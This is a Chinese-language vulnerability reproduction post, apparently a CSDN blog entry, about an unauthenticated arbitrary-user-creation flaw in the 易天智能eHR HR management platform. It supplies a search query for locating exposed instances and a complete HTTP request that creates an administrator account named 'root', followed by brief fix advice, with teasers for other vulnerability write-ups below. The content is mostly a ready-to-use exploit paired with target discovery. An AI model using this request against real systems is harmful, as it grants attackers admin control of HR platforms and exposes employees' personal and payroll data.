首页 > 其他分享 >【漏洞复现】易天智能eHR CreateUser 存在任意用户添加漏洞

【漏洞复现】易天智能eHR CreateUser 存在任意用户添加漏洞

时间:2024-09-09 22:53:11浏览次数:12  
标签:eHR 管理 Accept 漏洞 易天 CreateUser


》》》漏洞描述《《《

       易天智能eHR管理平台是一款功能全面、智能化的人力资源管理软件,旨在帮助企业提高人力资源管理效率和管理水平。该平台通过集成员工信息、薪酬管理、档案人事管理、绩效管理和招聘管理等多个模块,实现了人力资源管理的全面智能化管理。

        易天智能eHR管理平台 /BaseManage/UserAPI/CreateUser 接口存在任意用户添加漏洞,未经身份验证的远程攻击者可以利用此漏洞添加任意管理员用户,导致攻击者可直接管理后台,造成信息泄露,使系统处于极不安全的状态。


》》》资产收集《《《

body="易天智能eHR管理平台"


》》》漏洞复现《《《

访问目标网站

抓包替换

登录后台管理


》》》测试工具《《《

POC

GET /BaseManage/UserAPI/CreateUser?Account=root&Password=123456&OuterID=888 HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

》》》 修复建议《《《

  1. 关闭互联网暴露面或接口设置访问权限
  2. 升级至安全版本

标签:eHR,管理,Accept,漏洞,易天,CreateUser
From: https://blog.csdn.net/qq_48368964/article/details/142071529

相关文章

  • Web中的文件上传漏洞(中间件)
    1.前言: 漏洞参考地址:Vulhub-Docker-Composefileforvulnerabilityenvironment2.正文:1.1IIS漏洞利用版本:IIS67iis漏洞其实就是利用了其解析特性。1.目录解析漏洞:在IIS中,如果你的文件夹带有asp等可以执行的结尾,那么此文件夹中的所有文件都会被当成asp文件进行执......
  • 9月第一周漏洞学习
    蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞漏洞描述FastBee是一款开源物联网平台,致力于为全球开发者提供稳定、搞笑的物联网解决方案。FastBee在download接口中存在任意文件下载漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害fof......
  • discuz3.4文件包含漏洞
    首先查看修复:可以看到新增代码preg_match("/^[\w-]+\.php$/i",$parse['path']))来验证path是否为php文件,这个应该是修复路径遍历导致的文件读取漏洞。还有require'./'.$_ENV['curapp'].'.php';这里应该是另外一个漏洞,因为$parse['path']和$_ENV['curapp'......
  • LiteSpeed Cache 漏洞导致 600 万个 WordPress 网站遭受管理员接管
    LiteSpeedCache插件中存在一个严重的帐户接管漏洞,影响了超过600万个WordPress网站,该漏洞已于昨天通过6.5.0.1版发布进行修复。该漏洞允许未经身份验证的用户利用调试日志缺陷接管已登录的帐户,包括具有管理员权限的帐户。Patchstack的安全研究员RafieMuhammad在......
  • vulhub spring 远程命令执行漏洞(CVE-2016-4977)
    步骤一:执行以下命令启动靶场环境并在浏览器访问cd/vulhub/spring/CVE-2016-4977#进入漏洞环境所在目录docker-compose up-d#启动靶场 docker ps#查看容器信息步骤二:访问环境步骤三:192.168.0.107:8080/oauth/authorize?response_type=${2*2}&client_id=acme&scope=o......
  • 中间件解析漏洞
    IIS解析漏洞IIS6.x在iis6.x中,.asp文件夹中的任意文件都会被当做asp文件去执行。在wwwroot下新建一个x.asp里边写入jpg文件这里到物理机访问文件IIS7.x这里得先修改php.ini配置文件里cgi.fix_pathinfo-1前边的分号去掉然后进入到网站里修改处理映射关系/请求限制/把映......
  • RuoYi框架部分历史漏洞
    RuoYi框架部分历史漏洞生产环境搭建(代码审计)项目地址:若依(y_project)-Gitee.com官方文档:RuoYi项目构成因为RuoYi框架是基于SpringBoot搭建的,所以我们启动项目时不用像SpringMVC那样去配置我们的服务器然后把项目放到服务器上启动。我们成功导入项目之后会生成一些文件......
  • 「漏洞复现」全程云OA AttachFile/UploadFile 任意文件上传漏洞
    0x01 免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需......
  • Java反序列化漏洞-TemplatesImpl利用链分析
    目录一、前言二、正文1.寻找利用链2.构造POC2.1生成字节码2.2加载字节码1)getTransletInstance2)defineTransletClasses2.3创建实例3.完整POC三、参考文章一、前言java.lang.ClassLoader#defineClassdefineClass可以加载字节码,但由于defineClass的作用域是protected,所以攻......
  • 众诚网上订单系统 o_sa_order.ashx SQL注入漏洞复现
    1产品简介众诚网上订单系统通过集成互联网技术和先进的管理思想,为生产制造企业、多分销渠道的批零兼营、各类商贸批发业务提供了一站式的订单管理解决方案。该系统支持电脑PC、平板、手机APP同步操作,实现了订单、商品、客户、资金、信息、支付、物流和电子商务的全方位连接,......